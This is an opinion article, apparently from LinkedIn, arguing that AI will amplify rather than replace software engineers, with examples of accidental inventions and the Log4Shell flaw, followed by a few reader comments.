Will AI Replace Software Engineering? 💭💻

Will AI Replace Software Engineering? 💭💻

Ever since Jensen Huang, Mark Zuckerberg & Marc Benioff boldly predicted that "2025 will see the end of Mid Software Engineers and with it the start of the end of Software Engineering," the tech world, including my network, has been buzzing. Yet, here we are, three months into 2025, and software engineers are still very much employed.

This debate has sparked heated discussions among my peers, so much so that I figured it’s time to weigh in with my thoughts and perspective on the matter. While AI has undeniably changed how we code (I even did a post on the awesome project I built using "Vibe Coding😎" [check it out here]), I still believe it’s far from making software engineering obsolete, at least not in 2025 or 2026. Here’s why.

AI’s Blind Spot: It Learns from Perfection, Not Struggle

AI code generation, as we know it today, originated from the GitHub Copilot, which at the time "allegedly" leveraged vast repositories of existing & refined codebases. ( Yeah, allegedly, because I'd rather not open that pandora's box out of the mad respect for the Github 10X Devs. Awesome product, by the way.🫡)

But here's the catch: Version control does not capture the failures, idea pivots, dead-ends, and mental struggles that lead to breakthroughs for the dev to finally do that code commit or pull request. I even think that's the same reason why we invented Code Comments to try and capture these ideas for future reference. Code repositories store working solutions, not the meandering paths that led developers to discover those solutions. So, it should be safe to state that AI, in its current form, learns from the end product, not from the chaotic, messy, and interactive process of how knowledge was uncovered. It just can't navigate uncertainty, make mistakes, or sometimes, get lucky, and that's the bottom line.

What about the stoke of Human Serendipity, Can AI replicate that?

Did you know that some of the greatest inventions in history happened by accident? Luck, combined with the ability to recognize hidden potential in failures, has led to some of the most groundbreaking discoveries.

  • Take Penicillin, for example – Alexander Fleming returned from vacation to find mold contaminating his petri dishes. Instead of discarding them, he noticed something remarkable: the mold had killed the surrounding bacteria. That "contamination" became the world’s first antibiotic, saving millions of lives.
  • Or Microwave ovensPercy Spencer, working with radar technology, absentmindedly realized the chocolate bar in his pocket had melted. Intrigued, he tested popcorn kernels near the device, leading to the invention of a kitchen staple.
  • Then there’s Super GlueDr. Harry Coover was developing materials for wartime optics when he stumbled upon an adhesive so strong it stuck everything together. Originally dismissed as an inconvenience, it later became a revolutionary bonding agent.
  • And Teflon – Roy Plunkett was experimenting with refrigerants when he accidentally created a slippery, heat-resistant coating that would transform cookware forever.
  • And, of course, Gravity Sir Isaac Newton was said to be sitting under an apple tree when he observed an apple falling straight down. This seemingly ordinary event sparked one of the most fundamental scientific breakthroughs in history.

These are just a few examples, but it has been proven over time that inventions don't have a special approach around them and that some are just lucky breaks that people saw through them as just failures or norms.

So, do you think that AI, trained on patterns of success or refined data, can stumble upon the unexpected on its own? It doesn’t just trip over breakthroughs because we all know it has a structured instruction set. It can never wake up one morning and say, "Oops, I just changed the world, all by myself."

Would AI have prevented History's Most Critical Vulnerability: Log4Shell?

Let’s take a real-world test case: Remember the infamous Log4Shell vulnerability? The flaw, lurking in Apache Log4j 2.x - 2013, remained undetected for nearly a decade before finally being discovered in December 2021. Would AI have caught it sooner?

One might argue that AI-driven security tools are becoming increasingly advanced. But most still rely on known patterns—previous exploits, common attack vectors, and historical data. The problem? Security threats don’t always follow past patterns.

What makes human-driven cybersecurity effective is intuition, adversarial thinking, and sometimes, outright paranoia. The best security researchers aren’t just looking for issues that should exist—they’re questioning whether something could exist, even when there’s no clear evidence yet ( out-of-pattern thinking ). AI, by contrast, might have reinforced a false sense of security, trusting that widely reviewed code was safe simply because it had passed scrutiny for years or some rules proclaim that the code is immaculate.

If AI had been in charge, do you think it would, in isolation, have flagged the vulnerability earlier? Or would it have simply accepted the code as “working” because everyone else and the standard declared it?

The Language Paradox: Why do I think AI Will Always Fall Short?

Language is humanity’s greatest tool for simplifying thought, yet it still falls short. Words, symbols, and syntax are just approximations of human cognition. We even have phrases like "words can’t do it justice," acknowledging that language itself has limits.

If AI were truly capable of fully replacing human thought & reasoning, then language itself would have long since achieved this feat. As of today, over 7,000 languages exist worldwide, each attempting to articulate human experience in different ways, with some even having overlapping words. Language has existed in many forms: hieroglyphics, written scripts, spoken dialects, and even programming languages. Yet even with this diversity, no language has perfectly encoded human thought.

If something as evolved as language hasn’t perfectly captured human thought, how can AI, which is just another approximation, ever fully replicate creativity, intuition, and problem-solving?

Conclusion

AI will not replace developers, scientists, or thinkers—it will amplify them. It will automate the tedious surface patterns we might overlook and accelerate innovation. But true invention, the kind that changes history, will always require human intuition, curiosity, and serendipity. And the funniest thing is that AI is one of these inventions, and yet we think this would be the last of such inventions, especially in this space.

My 2 cents: AI is and will continue to act as the main catalyst for efficiency in software engineering, not the replacement.

The year is young, and that is a bold prediction, but we will just have to wait and see.

So, what’s your take?

AI is here to amplify delivery and allow humans to deliver faster.

Like
Reply

AI will make super Engineers, where an engineer will handle multiple complex tasks within a shorter time. This is more of making them managers and supervisors.

While I do sometimes worry about a "Skynet" situation (alignment problem + AGI), I agree that the current AI capabilities are a long way from replacing software engineers. "AI is and will continue to act as the main catalyst for efficiency in software engineering, not the replacement" Well said and great article!

From my interactions as an assistant/copilot it's a huge productivity booster. It can't yet work fully autonomous in private production grade codebases with 10s of thousands lines of code. The context window is still limited and after awhile it starts to "hallucinate". Either can't confidently you use it with unfamiliar tech stack, more often than not you'll need to step and fill it in or debug the code it generates. Where it excels is with widely adapted open source frameworks, you've a precise idea of the expected outcome so AI helps generate the code faster, refine or even critique/suggest alternatives. For now engineers are here to stay, though in lean teams with the AI productivity boost. But who knows if tomorrow, 5yrs...10yrs there will be a next gen LLM that addresses all the existing shortcomings 🤷🏾♂️ Very unpredictable trajectory ahead!

Like
Reply

To view or add a comment, sign in

More articles by Peter Mwaura W.

Others also viewed

Explore content categories